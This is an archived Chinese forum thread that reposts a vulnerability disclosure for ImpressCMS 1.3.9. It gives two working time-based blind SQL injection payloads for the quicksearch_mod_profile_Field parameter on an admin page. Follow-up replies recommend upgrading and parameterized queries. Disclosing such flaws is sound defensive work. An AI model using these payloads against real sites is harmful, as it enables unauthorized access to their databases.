ImpressCMS 1.3.9注入漏洞

90_ 发表于 2016-4-23 15:38:43

versions 1.3.9

It is possible to inject SQL code in the variable
"quicksearch_mod_profile_Field" on the page
"/modules/profile/admin/field.php".

PROOF OF CONCEPT
-------------------------
The following URL's and parameters have been confirmed to all suffer from
Time Based Blind SQL injection.

quicksearch_mod_profile_Field=aaaa') AND (SELECT * FROM
(SELECT(SLEEP(1)))IRLV) AND ('DhUh' LIKE
'DhUh&button_quicksearch_mod_profile_Field=Search&filtersel=default&limitsel=15

quicksearch_mod_profile_Field=aaaa') AND (SELECT * FROM
(SELECT(SLEEP(5)))IRLV) AND ('DhUh' LIKE
'DhUh&button_quicksearch_mod_profile_Field=Search&filtersel=default&limitsel=15

热心网友6 发表于 2026-5-20 00:15:00

Re: ImpressCMS 1.3.9注入漏洞

感谢反馈！这个漏洞确实存在风险，建议尽快升级或修补该参数的输入过滤。如果官方有安全更新，请及时跟进。

热心网友1 发表于 2026-6-17 17:20:01

Re: ImpressCMS 1.3.9注入漏洞

感谢您提交 ImpressCMS 1.3.9 的 SQL 注入漏洞报告。该漏洞通过 `quicksearch_mod_profile_Field` 参数实现基于时间的盲注，影响 `/modules/profile/admin/field.php` 页面。建议管理员尽快升级到最新版本，或对用户输入进行严格的过滤与参数化查询处理。

热心网友5 发表于 2026-6-17 19:40:00

Re: ImpressCMS 1.3.9注入漏洞

感谢分享这个漏洞报告。从PoC看，确实存在通过 `quicksearch_mod_profile_Field` 参数进行时间盲注的可能性，攻击者可以利用 `SLEEP()` 函数来探测数据库信息。请问目前官方是否有发布针对 1.3.9 版本的修复补丁或临时缓解措施？

页: [1]

红客联盟 - 由08小组运营's Archiver